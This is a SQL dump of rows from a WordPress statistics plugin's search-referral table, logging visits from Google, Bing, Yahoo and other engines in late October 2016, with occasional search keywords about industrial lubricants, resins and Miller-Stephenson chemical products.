INSERT INTO `wp_statistics_search` VALUES (3162, '2016-10-28', 'bing', 'www.bing.com', '', 13071); 
INSERT INTO `wp_statistics_search` VALUES (3163, '2016-10-28', 'bing', 'cn.bing.com', 'Connector Inc in Canada', 13072); 
INSERT INTO `wp_statistics_search` VALUES (3164, '2016-10-28', 'google', 'www.google.com', '', 13073); 
INSERT INTO `wp_statistics_search` VALUES (3165, '2016-10-28', 'google', 'www.google.ca', '', 13075); 
INSERT INTO `wp_statistics_search` VALUES (3166, '2016-10-28', 'google', 'www.google.com', '', 13079); 
INSERT INTO `wp_statistics_search` VALUES (3167, '2016-10-28', 'google', 'www.google.com', '', 13080); 
INSERT INTO `wp_statistics_search` VALUES (3168, '2016-10-28', 'google', 'www.google.com', '', 13081); 
INSERT INTO `wp_statistics_search` VALUES (3169, '2016-10-28', 'google', 'www.google.com', '', 13089); 
INSERT INTO `wp_statistics_search` VALUES (3170, '2016-10-28', 'google', 'www.google.com', '', 13091); 
INSERT INTO `wp_statistics_search` VALUES (3171, '2016-10-28', 'google', 'www.google.com', '', 13093); 
INSERT INTO `wp_statistics_search` VALUES (3172, '2016-10-28', 'google', 'www.google.com', '', 13094); 
INSERT INTO `wp_statistics_search` VALUES (3173, '2016-10-28', 'google', 'www.google.be', '', 13097); 
INSERT INTO `wp_statistics_search` VALUES (3174, '2016-10-28', 'google', 'www.google.com.do', '', 13103); 
INSERT INTO `wp_statistics_search` VALUES (3175, '2016-10-28', 'bing', 'www.bing.com', '', 13108); 
INSERT INTO `wp_statistics_search` VALUES (3176, '2016-10-28', 'google', 'www.google.com', '', 13110); 
INSERT INTO `wp_statistics_search` VALUES (3177, '2016-10-28', 'google', 'www.google.com', '', 13114); 
INSERT INTO `wp_statistics_search` VALUES (3178, '2016-10-28', 'google', 'www.google.com', '', 13120); 
INSERT INTO `wp_statistics_search` VALUES (3179, '2016-10-28', 'google', 'www.google.com', '', 13121); 
INSERT INTO `wp_statistics_search` VALUES (3180, '2016-10-28', 'google', 'www.google.com', '', 13123); 
INSERT INTO `wp_statistics_search` VALUES (3181, '2016-10-28', 'bing', 'www.bing.com', 'vazo 52', 13127); 
INSERT INTO `wp_statistics_search` VALUES (3182, '2016-10-28', 'google', 'www.google.com', '', 13129); 
INSERT INTO `wp_statistics_search` VALUES (3183, '2016-10-28', 'google', 'www.google.com', '', 13130); 
INSERT INTO `wp_statistics_search` VALUES (3184, '2016-10-28', 'bing', 'www.bing.com', 'crc contact cleaner army nsn', 13134); 
INSERT INTO `wp_statistics_search` VALUES (3185, '2016-10-28', 'google', 'www.google.com', '', 13141); 
INSERT INTO `wp_statistics_search` VALUES (3186, '2016-10-28', 'google', 'www.google.co.uk', '', 13143); 
INSERT INTO `wp_statistics_search` VALUES (3187, '2016-10-28', 'google', 'www.google.com', '', 13147); 
INSERT INTO `wp_statistics_search` VALUES (3188, '2016-10-28', 'google', 'www.google.com', '', 13148); 
INSERT INTO `wp_statistics_search` VALUES (3189, '2016-10-28', 'google', 'www.google.com.hk', '', 13149); 
INSERT INTO `wp_statistics_search` VALUES (3190, '2016-10-28', 'google', 'www.google.com', '', 13151); 
INSERT INTO `wp_statistics_search` VALUES (3191, '2016-10-28', 'google', 'www.google.com', '', 13154); 
INSERT INTO `wp_statistics_search` VALUES (3192, '2016-10-28', 'google', 'www.google.com', '', 13156); 
INSERT INTO `wp_statistics_search` VALUES (3193, '2016-10-28', 'google', 'www.google.com', '', 13158); 
INSERT INTO `wp_statistics_search` VALUES (3194, '2016-10-28', 'google', 'www.google.com', '', 13159); 
INSERT INTO `wp_statistics_search` VALUES (3195, '2016-10-28', 'google', 'www.google.com', '', 13161); 
INSERT INTO `wp_statistics_search` VALUES (3196, '2016-10-28', 'google', 'www.google.com', '', 13162); 
INSERT INTO `wp_statistics_search` VALUES (3197, '2016-10-28', 'google', 'google.com', '', 13164); 
INSERT INTO `wp_statistics_search` VALUES (3198, '2016-10-28', 'google', 'www.google.com', '', 13169); 
INSERT INTO `wp_statistics_search` VALUES (3199, '2016-10-28', 'google', 'www.google.com', '', 13170); 
INSERT INTO `wp_statistics_search` VALUES (3200, '2016-10-28', 'google', 'www.google.com', '', 13172); 
INSERT INTO `wp_statistics_search` VALUES (3201, '2016-10-28', 'google', 'www.google.com', '', 13173); 
INSERT INTO `wp_statistics_search` VALUES (3202, '2016-10-28', 'google', 'www.google.com', '', 13174); 
INSERT INTO `wp_statistics_search` VALUES (3203, '2016-10-28', 'google', 'www.google.com', '', 13176); 
INSERT INTO `wp_statistics_search` VALUES (3204, '2016-10-28', 'google', 'www.google.com', '', 13178); 
INSERT INTO `wp_statistics_search` VALUES (3205, '2016-10-28', 'bing', 'www.bing.com', 'miller-stephenson', 13179); 
INSERT INTO `wp_statistics_search` VALUES (3206, '2016-10-28', 'google', 'www.google.com', '', 13181); 
INSERT INTO `wp_statistics_search` VALUES (3207, '2016-10-28', 'google', 'www.google.ca', '', 13182); 
INSERT INTO `wp_statistics_search` VALUES (3208, '2016-10-28', 'google', 'www.google.com', '', 13183); 
INSERT INTO `wp_statistics_search` VALUES (3209, '2016-10-28', 'google', 'www.google.com', '', 13195); 
INSERT INTO `wp_statistics_search` VALUES (3210, '2016-10-28', 'google', 'www.google.com', '', 13201); 
INSERT INTO `wp_statistics_search` VALUES (3211, '2016-10-28', 'google', 'www.google.com', '', 13207); 
INSERT INTO `wp_statistics_search` VALUES (3212, '2016-10-28', 'google', 'www.google.com', '', 13209); 
INSERT INTO `wp_statistics_search` VALUES (3213, '2016-10-28', 'google', 'www.google.com', '', 13210); 
INSERT INTO `wp_statistics_search` VALUES (3214, '2016-10-28', 'google', 'www.google.com', '', 13214); 
INSERT INTO `wp_statistics_search` VALUES (3215, '2016-10-28', 'google', 'www.google.com', '', 13216); 
INSERT INTO `wp_statistics_search` VALUES (3216, '2016-10-28', 'google', 'www.google.com', '', 13219); 
INSERT INTO `wp_statistics_search` VALUES (3217, '2016-10-28', 'google', 'www.google.com', '', 13222); 
INSERT INTO `wp_statistics_search` VALUES (3218, '2016-10-28', 'google', 'www.google.com', '', 13223); 
INSERT INTO `wp_statistics_search` VALUES (3219, '2016-10-28', 'bing', 'www.bing.com', '', 13225); 
INSERT INTO `wp_statistics_search` VALUES (3220, '2016-10-28', 'google', 'www.google.com', '', 13226); 
INSERT INTO `wp_statistics_search` VALUES (3221, '2016-10-28', 'google', 'www.google.com', '', 13228); 
INSERT INTO `wp_statistics_search` VALUES (3222, '2016-10-28', 'google', 'www.google.com', '', 13229); 
INSERT INTO `wp_statistics_search` VALUES (3223, '2016-10-28', 'google', 'www.google.com', '', 13230); 
INSERT INTO `wp_statistics_search` VALUES (3224, '2016-10-28', 'google', 'www.google.com', '', 13231); 
INSERT INTO `wp_statistics_search` VALUES (3225, '2016-10-28', 'google', 'www.google.ca', '', 13235); 
INSERT INTO `wp_statistics_search` VALUES (3226, '2016-10-28', 'google', 'www.google.com', '', 13242); 
INSERT INTO `wp_statistics_search` VALUES (3227, '2016-10-28', 'google', 'www.google.com.pe', '', 13243); 
INSERT INTO `wp_statistics_search` VALUES (3228, '2016-10-28', 'google', 'www.google.com', '', 13244); 
INSERT INTO `wp_statistics_search` VALUES (3229, '2016-10-28', 'google', 'www.google.com', '', 13245); 
INSERT INTO `wp_statistics_search` VALUES (3230, '2016-10-28', 'google', 'www.google.ca', '', 13248); 
INSERT INTO `wp_statistics_search` VALUES (3231, '2016-10-28', 'google', 'www.google.com', '', 13254); 
INSERT INTO `wp_statistics_search` VALUES (3232, '2016-10-28', 'google', 'www.google.com', '', 13255); 
INSERT INTO `wp_statistics_search` VALUES (3233, '2016-10-28', 'google', 'www.google.com', '', 13260); 
INSERT INTO `wp_statistics_search` VALUES (3234, '2016-10-28', 'google', 'www.google.com', '', 13261); 
INSERT INTO `wp_statistics_search` VALUES (3235, '2016-10-28', 'google', 'www.google.com', '', 13264); 
INSERT INTO `wp_statistics_search` VALUES (3236, '2016-10-28', 'google', 'www.google.com', '', 13265); 
INSERT INTO `wp_statistics_search` VALUES (3237, '2016-10-28', 'google', 'www.google.com', '', 13266); 
INSERT INTO `wp_statistics_search` VALUES (3238, '2016-10-28', 'google', 'www.google.com', '', 13267); 
INSERT INTO `wp_statistics_search` VALUES (3239, '2016-10-28', 'google', 'www.google.com', '', 13269); 
INSERT INTO `wp_statistics_search` VALUES (3240, '2016-10-28', 'google', 'www.google.com', '', 13272); 
INSERT INTO `wp_statistics_search` VALUES (3241, '2016-10-28', 'google', 'www.google.com', '', 13274); 
INSERT INTO `wp_statistics_search` VALUES (3242, '2016-10-28', 'google', 'www.google.com', '', 13275); 
INSERT INTO `wp_statistics_search` VALUES (3243, '2016-10-28', 'google', 'www.google.com', '', 13276); 
INSERT INTO `wp_statistics_search` VALUES (3244, '2016-10-28', 'google', 'www.google.com', 'curing agent epicure W', 13281); 
INSERT INTO `wp_statistics_search` VALUES (3245, '2016-10-28', 'google', 'www.google.com', '', 13283); 
INSERT INTO `wp_statistics_search` VALUES (3246, '2016-10-28', 'google', 'www.google.com', '', 13284); 
INSERT INTO `wp_statistics_search` VALUES (3247, '2016-10-28', 'google', 'www.google.com', '', 13286); 
INSERT INTO `wp_statistics_search` VALUES (3248, '2016-10-28', 'bing', 'www.bing.com', 'Polyphenyl Ether Lubricant', 13288); 
INSERT INTO `wp_statistics_search` VALUES (3249, '2016-10-28', 'google', 'www.google.com', '', 13292); 
INSERT INTO `wp_statistics_search` VALUES (3250, '2016-10-28', 'google', 'www.google.com', '', 13296); 
INSERT INTO `wp_statistics_search` VALUES (3251, '2016-10-28', 'google', 'www.google.com', '', 13309); 
INSERT INTO `wp_statistics_search` VALUES (3252, '2016-10-28', 'google', 'www.google.com', '', 13316); 
INSERT INTO `wp_statistics_search` VALUES (3253, '2016-10-28', 'bing', 'www.bing.com', 'eponex resin 1510', 13320); 
INSERT INTO `wp_statistics_search` VALUES (3254, '2016-10-28', 'google', 'www.google.com', '', 13322); 
INSERT INTO `wp_statistics_search` VALUES (3255, '2016-10-28', 'google', 'www.google.com', '', 13324); 
INSERT INTO `wp_statistics_search` VALUES (3256, '2016-10-28', 'google', 'www.google.com', '', 13330); 
INSERT INTO `wp_statistics_search` VALUES (3257, '2016-10-28', 'google', 'www.google.com', '', 13333); 
INSERT INTO `wp_statistics_search` VALUES (3258, '2016-10-28', 'google', 'www.google.com', '', 13337); 
INSERT INTO `wp_statistics_search` VALUES (3259, '2016-10-28', 'google', 'www.google.com', '', 13338); 
INSERT INTO `wp_statistics_search` VALUES (3260, '2016-10-28', 'google', 'www.google.com.mx', '', 13348); 
INSERT INTO `wp_statistics_search` VALUES (3261, '2016-10-28', 'google', 'www.google.com', '', 13349); 
INSERT INTO `wp_statistics_search` VALUES (3262, '2016-10-29', 'google', 'www.google.com', '', 13352); 
INSERT INTO `wp_statistics_search` VALUES (3263, '2016-10-29', 'google', 'www.google.com', '', 13356); 
INSERT INTO `wp_statistics_search` VALUES (3264, '2016-10-29', 'google', 'www.google.com', 'epoxy release agent that will not interfer with finishes', 13371); 
INSERT INTO `wp_statistics_search` VALUES (3265, '2016-10-29', 'google', 'www.google.com', '', 13374); 
INSERT INTO `wp_statistics_search` VALUES (3266, '2016-10-29', 'bing', 'www.bing.com', 'eponex resin 1510', 13381); 
INSERT INTO `wp_statistics_search` VALUES (3267, '2016-10-29', 'google', 'www.google.com', '', 13388); 
INSERT INTO `wp_statistics_search` VALUES (3268, '2016-10-29', 'google', 'www.google.co.in', '', 13396); 
INSERT INTO `wp_statistics_search` VALUES (3269, '2016-10-29', 'google', 'www.google.com.tw', '', 13397); 
INSERT INTO `wp_statistics_search` VALUES (3270, '2016-10-29', 'google', 'www.google.com.mx', '', 13400); 
INSERT INTO `wp_statistics_search` VALUES (3271, '2016-10-29', 'google', 'www.google.com.vn', '', 13414); 
INSERT INTO `wp_statistics_search` VALUES (3272, '2016-10-29', 'google', 'www.google.com', '', 13432); 
INSERT INTO `wp_statistics_search` VALUES (3273, '2016-10-29', 'google', 'www.google.com', '', 13433); 
INSERT INTO `wp_statistics_search` VALUES (3274, '2016-10-29', 'google', 'www.google.nl', '', 13444); 
INSERT INTO `wp_statistics_search` VALUES (3275, '2016-10-29', 'google', 'www.google.com', '', 13456); 
INSERT INTO `wp_statistics_search` VALUES (3276, '2016-10-29', 'google', 'www.google.com', '', 13457); 
INSERT INTO `wp_statistics_search` VALUES (3277, '2016-10-29', 'bing', 'www.bing.com', 'krytox grease', 13467); 
INSERT INTO `wp_statistics_search` VALUES (3278, '2016-10-29', 'google', 'www.google.com', '', 13477); 
INSERT INTO `wp_statistics_search` VALUES (3279, '2016-10-29', 'google', 'www.google.com', '', 13478); 
INSERT INTO `wp_statistics_search` VALUES (3280, '2016-10-29', 'google', 'www.google.com', '', 13479); 
INSERT INTO `wp_statistics_search` VALUES (3281, '2016-10-29', 'google', 'www.google.com', '', 13482); 
INSERT INTO `wp_statistics_search` VALUES (3282, '2016-10-29', 'google', 'www.google.com', '', 13497); 
INSERT INTO `wp_statistics_search` VALUES (3283, '2016-10-29', 'google', 'www.google.lt', '', 13507); 
INSERT INTO `wp_statistics_search` VALUES (3284, '2016-10-29', 'google', 'www.google.com.sa', '', 13519); 
INSERT INTO `wp_statistics_search` VALUES (3285, '2016-10-29', 'google', 'www.google.com.tr', '', 13534); 
INSERT INTO `wp_statistics_search` VALUES (3286, '2016-10-29', 'google', 'www.google.com', '', 13537); 
INSERT INTO `wp_statistics_search` VALUES (3287, '2016-10-29', 'google', 'www.google.com', '', 13542); 
INSERT INTO `wp_statistics_search` VALUES (3288, '2016-10-29', 'duckduckgo', 'duckduckgo.com', '', 13543); 
INSERT INTO `wp_statistics_search` VALUES (3289, '2016-10-29', 'google', 'www.google.com', '', 13552); 
INSERT INTO `wp_statistics_search` VALUES (3290, '2016-10-30', 'yandex', 'yandex.ru', '', 13570); 
INSERT INTO `wp_statistics_search` VALUES (3291, '2016-10-30', 'google', 'www.google.com', '', 13580); 
INSERT INTO `wp_statistics_search` VALUES (3292, '2016-10-30', 'google', 'www.google.com', 'krytox lvp as dielectric', 13583); 
INSERT INTO `wp_statistics_search` VALUES (3293, '2016-10-30', 'bing', 'www.bing.com', 'Vertrel SDG Vapor Degreasing', 13595); 
INSERT INTO `wp_statistics_search` VALUES (3294, '2016-10-30', 'google', 'www.google.com', '', 13740); 
INSERT INTO `wp_statistics_search` VALUES (3295, '2016-10-30', 'google', 'www.google.com', '', 13752); 
INSERT INTO `wp_statistics_search` VALUES (3296, '2016-10-30', 'google', 'www.google.ro', '', 13756); 
INSERT INTO `wp_statistics_search` VALUES (3297, '2016-10-30', 'google', 'www.google.com', '', 13763); 
INSERT INTO `wp_statistics_search` VALUES (3298, '2016-10-30', 'google', 'www.google.com', '', 13767); 
INSERT INTO `wp_statistics_search` VALUES (3299, '2016-10-30', 'google', 'www.google.co.kr', '', 13776); 
INSERT INTO `wp_statistics_search` VALUES (3300, '2016-10-30', 'google', 'www.google.com', '', 13777); 
INSERT INTO `wp_statistics_search` VALUES (3301, '2016-10-30', 'google', 'www.google.com', '', 13794); 
INSERT INTO `wp_statistics_search` VALUES (3302, '2016-10-30', 'google', 'www.google.com', '', 13798); 
INSERT INTO `wp_statistics_search` VALUES (3303, '2016-10-30', 'google', 'www.google.ca', '', 13800); 
INSERT INTO `wp_statistics_search` VALUES (3304, '2016-10-30', 'google', 'www.google.co.il', '', 13801); 
INSERT INTO `wp_statistics_search` VALUES (3305, '2016-10-30', 'google', 'www.google.co.in', '', 13811); 
INSERT INTO `wp_statistics_search` VALUES (3306, '2016-10-30', 'google', 'www.google.com', '', 13813); 
INSERT INTO `wp_statistics_search` VALUES (3307, '2016-10-30', 'google', 'www.google.ru', '', 13816); 
INSERT INTO `wp_statistics_search` VALUES (3308, '2016-10-30', 'google', 'google.com', '', 13817); 
INSERT INTO `wp_statistics_search` VALUES (3309, '2016-10-30', 'google', 'www.google.com', '', 13820); 
INSERT INTO `wp_statistics_search` VALUES (3310, '2016-10-30', 'google', 'www.google.com', '', 13828); 
INSERT INTO `wp_statistics_search` VALUES (3311, '2016-10-30', 'google', 'www.google.ca', '', 13829); 
INSERT INTO `wp_statistics_search` VALUES (3312, '2016-10-30', 'google', 'www.google.com', '', 13831); 
INSERT INTO `wp_statistics_search` VALUES (3313, '2016-10-30', 'google', 'www.google.com', '', 13836); 
INSERT INTO `wp_statistics_search` VALUES (3314, '2016-10-30', 'google', 'www.google.com', '', 13841); 
INSERT INTO `wp_statistics_search` VALUES (3315, '2016-10-30', 'google', 'www.google.com', '', 13843); 
INSERT INTO `wp_statistics_search` VALUES (3316, '2016-10-30', 'google', 'www.google.com', '', 13849); 
INSERT INTO `wp_statistics_search` VALUES (3317, '2016-10-30', 'bing', 'www.bing.com', 'crazing resistance in coatings', 13851); 
INSERT INTO `wp_statistics_search` VALUES (3318, '2016-10-31', 'google', 'www.google.com', '', 13856); 
INSERT INTO `wp_statistics_search` VALUES (3319, '2016-10-31', 'google', 'www.google.com', '', 13859); 
INSERT INTO `wp_statistics_search` VALUES (3320, '2016-10-31', 'google', 'www.google.com', '', 13860); 
INSERT INTO `wp_statistics_search` VALUES (3321, '2016-10-31', 'google', 'www.google.com.au', '', 13863); 
INSERT INTO `wp_statistics_search` VALUES (3322, '2016-10-31', 'google', 'www.google.com', '', 13870); 
INSERT INTO `wp_statistics_search` VALUES (3323, '2016-10-31', 'google', 'www.google.com', '', 13873); 
INSERT INTO `wp_statistics_search` VALUES (3324, '2016-10-31', 'google', 'www.google.com.hk', '', 13875); 
INSERT INTO `wp_statistics_search` VALUES (3325, '2016-10-31', 'google', 'www.google.com.hk', '', 13876); 
INSERT INTO `wp_statistics_search` VALUES (3326, '2016-10-31', 'google', 'www.google.co.jp', '', 13877); 
INSERT INTO `wp_statistics_search` VALUES (3327, '2016-10-31', 'bing', 'www.bing.com', 'miller-stephenson.com msds ms-143te', 13882); 
INSERT INTO `wp_statistics_search` VALUES (3328, '2016-10-31', 'google', 'com.google.android.googlequicksearchbox', '', 13902); 
INSERT INTO `wp_statistics_search` VALUES (3329, '2016-10-31', 'google', 'www.google.com', '', 13935); 
INSERT INTO `wp_statistics_search` VALUES (3330, '2016-10-31', 'google', 'www.google.co.kr', '', 13936); 
INSERT INTO `wp_statistics_search` VALUES (3331, '2016-10-31', 'google', 'www.google.co.kr', '', 13937); 
INSERT INTO `wp_statistics_search` VALUES (3332, '2016-10-31', 'bing', 'www.bing.com', '', 13946); 
INSERT INTO `wp_statistics_search` VALUES (3333, '2016-10-31', 'google', 'www.google.co.kr', '', 13957); 
INSERT INTO `wp_statistics_search` VALUES (3334, '2016-10-31', 'google', 'www.google.es', '', 13959); 
INSERT INTO `wp_statistics_search` VALUES (3335, '2016-10-31', 'google', 'www.google.ch', '', 13960); 
INSERT INTO `wp_statistics_search` VALUES (3336, '2016-10-31', 'google', 'www.google.com', '', 13961); 
INSERT INTO `wp_statistics_search` VALUES (3337, '2016-10-31', 'google', 'www.google.fr', '', 13967); 
INSERT INTO `wp_statistics_search` VALUES (3338, '2016-10-31', 'google', 'www.google.de', '', 13971); 
INSERT INTO `wp_statistics_search` VALUES (3339, '2016-10-31', 'google', 'www.google.com', '', 13975); 
INSERT INTO `wp_statistics_search` VALUES (3340, '2016-10-31', 'google', 'www.google.co.uk', '', 13977); 
INSERT INTO `wp_statistics_search` VALUES (3341, '2016-10-31', 'google', 'www.google.co.in', '', 13978); 
INSERT INTO `wp_statistics_search` VALUES (3342, '2016-10-31', 'google', 'www.google.com', '', 13982); 
INSERT INTO `wp_statistics_search` VALUES (3343, '2016-10-31', 'google', 'www.google.ch', '', 13995); 
INSERT INTO `wp_statistics_search` VALUES (3344, '2016-10-31', 'google', 'www.google.com', '', 13998); 
INSERT INTO `wp_statistics_search` VALUES (3345, '2016-10-31', 'google', 'www.google.com', '', 13999); 
INSERT INTO `wp_statistics_search` VALUES (3346, '2016-10-31', 'google', 'www.google.com.sa', '', 14001); 
INSERT INTO `wp_statistics_search` VALUES (3347, '2016-10-31', 'bing', 'www.bing.com', '', 14004); 
INSERT INTO `wp_statistics_search` VALUES (3348, '2016-10-31', 'google', 'www.google.com', '', 14005); 
INSERT INTO `wp_statistics_search` VALUES (3349, '2016-10-31', 'google', 'www.google.co.il', '', 14013); 
INSERT INTO `wp_statistics_search` VALUES (3350, '2016-10-31', 'google', 'www.google.com', '', 14014); 
INSERT INTO `wp_statistics_search` VALUES (3351, '2016-10-31', 'google', 'www.google.com', '', 14015); 
INSERT INTO `wp_statistics_search` VALUES (3352, '2016-10-31', 'google', 'www.google.com', '', 14018); 
INSERT INTO `wp_statistics_search` VALUES (3353, '2016-10-31', 'google', 'www.google.com', '', 14019); 
INSERT INTO `wp_statistics_search` VALUES (3354, '2016-10-31', 'google', 'www.google.nl', '', 14020); 
INSERT INTO `wp_statistics_search` VALUES (3355, '2016-10-31', 'google', 'www.google.fr', '', 14027); 
INSERT INTO `wp_statistics_search` VALUES (3356, '2016-10-31', 'google', 'www.google.com', '', 14028); 
INSERT INTO `wp_statistics_search` VALUES (3357, '2016-10-31', 'google', 'www.google.com', '', 14029); 
INSERT INTO `wp_statistics_search` VALUES (3358, '2016-10-31', 'google', 'www.google.fr', '', 14030); 
INSERT INTO `wp_statistics_search` VALUES (3359, '2016-10-31', 'google', 'www.google.com', '', 14035); 
INSERT INTO `wp_statistics_search` VALUES (3360, '2016-10-31', 'google', 'www.google.com', '', 14036); 
INSERT INTO `wp_statistics_search` VALUES (3361, '2016-10-31', 'google', 'www.google.com', '', 14038); 
INSERT INTO `wp_statistics_search` VALUES (3362, '2016-10-31', 'google', 'www.google.ca', '', 14041); 
INSERT INTO `wp_statistics_search` VALUES (3363, '2016-10-31', 'google', 'www.google.com', '', 14043); 
INSERT INTO `wp_statistics_search` VALUES (3364, '2016-10-31', 'google', 'www.google.com', '', 14046); 
INSERT INTO `wp_statistics_search` VALUES (3365, '2016-10-31', 'google', 'www.google.de', '', 14047); 
INSERT INTO `wp_statistics_search` VALUES (3366, '2016-10-31', 'google', 'www.google.com', '', 14050); 
INSERT INTO `wp_statistics_search` VALUES (3367, '2016-10-31', 'google', 'www.google.com', '', 14053); 
INSERT INTO `wp_statistics_search` VALUES (3368, '2016-10-31', 'google', 'www.google.ca', '', 14055); 
INSERT INTO `wp_statistics_search` VALUES (3369, '2016-10-31', 'google', 'www.google.com.ph', '', 14056); 
INSERT INTO `wp_statistics_search` VALUES (3370, '2016-10-31', 'google', 'cse.google.com', '', 14057); 
INSERT INTO `wp_statistics_search` VALUES (3371, '2016-10-31', 'google', 'www.google.com', '', 14059); 
INSERT INTO `wp_statistics_search` VALUES (3372, '2016-10-31', 'google', 'www.google.com', '', 14062); 
INSERT INTO `wp_statistics_search` VALUES (3373, '2016-10-31', 'yahoo', 'search.yahoo.com', '', 14063); 
INSERT INTO `wp_statistics_search` VALUES (3374, '2016-10-31', 'bing', 'www.bing.com', 'miller stephen krytok grease 227', 14064); 
INSERT INTO `wp_statistics_search` VALUES (3375, '2016-10-31', 'yahoo', 'r.search.yahoo.com', '', 14065); 
INSERT INTO `wp_statistics_search` VALUES (3376, '2016-10-31', 'google', 'www.google.fr', '', 14070); 
INSERT INTO `wp_statistics_search` VALUES (3377, '2016-10-31', 'google', 'www.google.ca', '', 14072); 
INSERT INTO `wp_statistics_search` VALUES (3378, '2016-10-31', 'bing', 'www.bing.com', '', 14074); 
INSERT INTO `wp_statistics_search` VALUES (3379, '2016-10-31', 'google', 'www.google.com', '', 14075); 
INSERT INTO `wp_statistics_search` VALUES (3380, '2016-10-31', 'google', 'www.google.com', '', 14076); 
INSERT INTO `wp_statistics_search` VALUES (3381, '2016-10-31', 'google', 'www.google.com', '', 14077); 
INSERT INTO `wp_statistics_search` VALUES (3382, '2016-10-31', 'google', 'www.google.com', '', 14078); 
INSERT INTO `wp_statistics_search` VALUES (3383, '2016-10-31', 'google', 'www.google.ca', '', 14079); 
INSERT INTO `wp_statistics_search` VALUES (3384, '2016-10-31', 'google', 'www.google.com', '', 14080); 
INSERT INTO `wp_statistics_search` VALUES (3385, '2016-10-31', 'google', 'www.google.com', '', 14081); 
INSERT INTO `wp_statistics_search` VALUES (3386, '2016-10-31', 'google', 'www.google.fr', '', 14082); 
INSERT INTO `wp_statistics_search` VALUES (3387, '2016-10-31', 'google', 'www.google.com', '', 14086); 
INSERT INTO `wp_statistics_search` VALUES (3388, '2016-10-31', 'google', 'www.google.com', '', 14094); 
INSERT INTO `wp_statistics_search` VALUES (3389, '2016-10-31', 'google', 'www.google.com', '', 14095); 
INSERT INTO `wp_statistics_search` VALUES (3390, '2016-10-31', 'google', 'www.google.com', '', 14096); 
INSERT INTO `wp_statistics_search` VALUES (3391, '2016-10-31', 'google', 'www.google.ch', '', 14097); 
INSERT INTO `wp_statistics_search` VALUES (3392, '2016-10-31', 'google', 'www.google.com', '', 14098); 
INSERT INTO `wp_statistics_search` VALUES (3393, '2016-10-31', 'google', 'www.google.com', '', 14099); 
INSERT INTO `wp_statistics_search` VALUES (3394, '2016-10-31', 'google', 'www.google.com', '', 14100); 
INSERT INTO `wp_statistics_search` VALUES (3395, '2016-10-31', 'google', 'www.google.com', '', 14102); 
INSERT INTO `wp_statistics_search` VALUES (3396, '2016-10-31', 'google', 'www.google.com', '', 14104); 
INSERT INTO `wp_statistics_search` VALUES (3397, '2016-10-31', 'google', 'www.google.com', '', 14105); 
INSERT INTO `wp_statistics_search` VALUES (3398, '2016-10-31', 'google', 'www.google.com', '', 14106); 
INSERT INTO `wp_statistics_search` VALUES (3399, '2016-10-31', 'google', 'www.google.com.mx', '', 14107); 
INSERT INTO `wp_statistics_search` VALUES (3400, '2016-10-31', 'bing', 'www.bing.com', 'Miller-Stephenson Chemical MS-122AD PTFE Release Agent/Dry Lubricant  sds', 14109); 
INSERT INTO `wp_statistics_search` VALUES (3401, '2016-10-31', 'google', 'www.google.com', '', 14111); 
INSERT INTO `wp_statistics_search` VALUES (3402, '2016-10-31', 'google', 'www.google.com', '', 14112); 
INSERT INTO `wp_statistics_search` VALUES (3403, '2016-10-31', 'bing', 'www.bing.com', '', 14119); 
INSERT INTO `wp_statistics_search` VALUES (3404, '2016-10-31', 'google', 'www.google.com', '', 14124); 
INSERT INTO `wp_statistics_search` VALUES (3405, '2016-10-31', 'google', 'www.google.com.mx', '', 14126); 
INSERT INTO `wp_statistics_search` VALUES (3406, '2016-10-31', 'google', 'cse.google.com', '', 14129); 
INSERT INTO `wp_statistics_search` VALUES (3407, '2016-10-31', 'google', 'www.google.com', '', 14130); 
INSERT INTO `wp_statistics_search` VALUES (3408, '2016-10-31', 'google', 'www.google.com', '', 14131); 
INSERT INTO `wp_statistics_search` VALUES (3409, '2016-10-31', 'google', 'www.google.com', '', 14133); 
INSERT INTO `wp_statistics_search` VALUES (3410, '2016-10-31', 'bing', 'www.bing.com', '', 14134); 
INSERT INTO `wp_statistics_search` VALUES (3411, '2016-10-31', 'bing', 'www.bing.com', 'miller stephenson', 14136); 
INSERT INTO `wp_statistics_search` VALUES (3412, '2016-10-31', 'google', 'www.google.com', '', 14140); 
INSERT INTO `wp_statistics_search` VALUES (3413, '2016-10-31', 'google', 'www.google.com', '', 14144); 
INSERT INTO `wp_statistics_search` VALUES (3414, '2016-10-31', 'google', 'www.google.com', '', 14146); 
INSERT INTO `wp_statistics_search` VALUES (3415, '2016-10-31', 'google', 'www.google.com', '', 14147); 
INSERT INTO `wp_statistics_search` VALUES (3416, '2016-10-31', 'google', 'www.google.com', '', 14148); 
INSERT INTO `wp_statistics_search` VALUES (3417, '2016-10-31', 'google', 'www.google.com', '', 14149); 
INSERT INTO `wp_statistics_search` VALUES (3418, '2016-10-31', 'yahoo', 'search.yahoo.com', '', 14151); 
INSERT INTO `wp_statistics_search` VALUES (3419, '2016-10-31', 'google', 'www.google.com', '', 14153); 
INSERT INTO `wp_statistics_search` VALUES (3420, '2016-10-31', 'google', 'www.google.com', '', 14154); 
INSERT INTO `wp_statistics_search` VALUES (3421, '2016-10-31', 'google', 'www.google.com', '', 14155); 
INSERT INTO `wp_statistics_search` VALUES (3422, '2016-10-31', 'google', 'www.google.com', '', 14156); 
INSERT INTO `wp_statistics_search` VALUES (3423, '2016-10-31', 'google', 'www.google.com', '', 14158); 
INSERT INTO `wp_statistics_search` VALUES (3424, '2016-10-31', 'google', 'www.google.ca', '', 14162); 
INSERT INTO `wp_statistics_search` VALUES (3425, '2016-10-31', 'google', 'www.google.ca', '', 14164); 
INSERT INTO `wp_statistics_search` VALUES (3426, '2016-10-31', 'google', 'www.google.com', '', 14165); 
INSERT INTO `wp_statistics_search` VALUES (3427, '2016-10-31', 'google', 'www.google.com', '', 14166); 
INSERT INTO `wp_statistics_search` VALUES (3428, '2016-10-31', 'google', 'www.google.com', '', 14168); 
INSERT INTO `wp_statistics_search` VALUES (3429, '2016-10-31', 'yahoo', 'search.yahoo.com', '', 14169); 
INSERT INTO `wp_statistics_search` VALUES (3430, '2016-10-31', 'google', 'www.google.com', '', 14171); 
INSERT INTO `wp_statistics_search` VALUES (3431, '2016-10-31', 'google', 'www.google.com', '', 14172); 
INSERT INTO `wp_statistics_search` VALUES (3432, '2016-10-31', 'google', 'www.google.com', '', 14175); 
INSERT INTO `wp_statistics_search` VALUES (3433, '2016-10-31', 'google', 'www.google.com', '', 14182); 
INSERT INTO `wp_statistics_search` VALUES (3434, '2016-10-31', 'google', 'www.google.com', '', 14185); 
INSERT INTO `wp_statistics_search` VALUES (3435, '2016-10-31', 'google', 'www.google.com', '', 14186); 
INSERT INTO `wp_statistics_search` VALUES (3436, '2016-10-31', 'google', 'www.google.com', '', 14188); 
